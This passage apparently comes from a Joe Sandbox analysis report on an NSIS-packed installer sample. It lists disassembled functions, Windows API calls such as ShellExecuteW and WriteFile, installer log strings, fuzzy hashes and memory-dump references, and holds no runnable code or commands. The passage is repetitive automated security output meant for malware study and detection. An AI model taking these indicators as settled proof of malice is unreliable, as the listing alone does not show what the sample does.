soft, xrefs: 004036A1

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00424CAD,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

... %d%%, xrefs: 004034C8
(]C, xrefs: 004033FD
pAB, xrefs: 004033AB

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB
API String ID: 651206458-3635341587
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00424CAD,76F923A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424CAD,76F923A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
SpecialtiesThrownOptics, xrefs: 00402770

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$SpecialtiesThrownOptics$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-1028791334
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424CAD,76F923A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
